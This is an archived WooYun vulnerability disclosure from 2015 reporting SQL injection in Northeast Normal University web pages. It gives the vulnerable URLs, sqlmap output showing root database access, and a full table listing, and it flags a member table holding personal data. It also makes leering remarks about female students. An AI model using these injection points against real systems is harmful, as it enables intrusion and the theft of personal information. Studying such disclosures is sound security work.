乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-26: 细节已通知厂商并且等待厂商处理中 2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开
大学生毕业季,师范大学妹子多多,不看不知道,一看吓一跳。
漏洞地址:
http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295
web application technology: Apache 2.2.21, PHP 5.2.17back-end DBMS: MySQL 5.0current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:web application technology: Apache 2.2.21, PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'root@localhost'
root 权限
web application technology: Apache 2.2.21, PHP 5.2.17back-end DBMS: MySQL 5.0available databases [6]:[*] gallery[*] geyx[*] information_schema[*] mysql[*] nenunew[*] wurfl
web application technology: Apache 2.2.21, PHP 5.2.17back-end DBMS: MySQL 5.0Database: nenunew[64 tables]+----------------------+| E$_nenu_urp || SNP_CHECK_TAB || adminuser || columny || daily_scorea || daily_scoreb || liiuy || nenu_academic || nenu_addon22 || nenu_addon23 || nenu_addonacademic || nenu_addonbasic || nenu_addonlaw || nenu_addonlinks || nenu_addonnews || nenu_addonnotice || nenu_addonxwgk || nenu_admin || nenu_admintype || nenu_arcatt || nenu_archives || nenu_archives22 || nenu_archives23 || nenu_arcrank || nenu_arctype || nenu_basic || nenu_cache_tagindex || nenu_calendary || nenu_channeltype || nenu_full_search || nenu_guest || nenu_homepageset || nenu_ip || nenu_keywords || nenu_law || nenu_links || nenu_log || nenu_member || nenu_news || nenu_notice || nenu_qanswer || nenu_qcommit || nenu_qquestion || nenu_qresponese || nenu_qsurvey || nenu_search_cache || nenu_search_keywords || nenu_search_rule || nenu_smalltypes || nenu_sysconfig || nenu_syspassport || nenu_tag_index || nenu_tag_list || nenu_uploads || nenu_urp || nenu_xwgk || newnotice || pro_score || professor_en || professorinfo || rate || rizhi || staff || yut |+----------------------+
nenu_member表还存在敏感信息http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15这个分站也存在SQL注入
nenu_member表还存在敏感信息
SQL 过滤保护好未来教师们的信息哦~(特别是美女教师!!)
危害等级:无影响厂商忽略
忽略时间:2015-07-01 11:22
暂无